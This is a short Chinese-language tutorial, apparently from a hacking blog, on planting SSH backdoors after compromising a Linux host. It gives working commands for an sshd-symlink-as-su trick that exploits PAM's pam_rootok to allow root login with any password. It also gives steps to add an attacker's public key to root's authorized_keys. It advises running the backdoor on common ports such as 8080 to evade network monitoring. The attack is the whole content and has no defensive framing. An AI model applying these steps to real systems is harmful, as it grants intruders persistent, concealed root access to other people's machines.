SSHD软连接后门
软连接后门是sshd启用PAM认证的前提下,利用了一个PAM配置文件
将sshd文件生成软连接,把名称设置为su,应用在启动中会去和PAM配置文件夹中寻找是否存在对应名称的配置信息(su)
只要pam_rootok模块检测uid是0即可认证成功,这样就导致了可以使用任意密码登录
开启PAM认证机制在/etc/ssh/sshd_config文件中,设置UsePAM为yes
查看/etc/pam.d/su文件存在auth suddicient pam_rootok.so就能创建软连接
创建用ln命令建立一个sshd软连接后门,并开启一个常见端口
ln -sf /usr/sbin/sshd /tmp/su
/tmp/su -oport=2222
连接然后可以ssh直接连接IP:端口,用户为root,密码任意输入即可好处是能够绕过一些网络设备的安全流量监测,但是本地监听端口时会很容易暴露
所以建议设置成常见端口8080、8000、8081等等
附视频操作
利用公钥无密码登录
原理是用ssh生成一个公钥放在服务器上,我们就可以通过ssh秘钥进行无密码连接服务器了
首先使用攻击主机生成rsa秘钥
ssh-keygen -t rsa
这里有两个文件idrsa是连接ssh所用的私钥,idrsa.pub中的内容是公钥
把idrsa.pub写入服务端的authorizedkeys中
注意啊没有这个文件的话,就自己创建一个
在root目录下
mkdir ~/.ssh
cd .ssh
touch authorized_keys
添加权限,可加可不加。
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
然后将公钥idrsa.pub内容写入文件
echo "id_rsa.pub的内容" > ~/.ssh/authorized_keys
然后就可以用ssh使用秘钥无密码连接主机了。
正常连接是提示输入密码的,写入公钥后无需输入密码。
附视频操作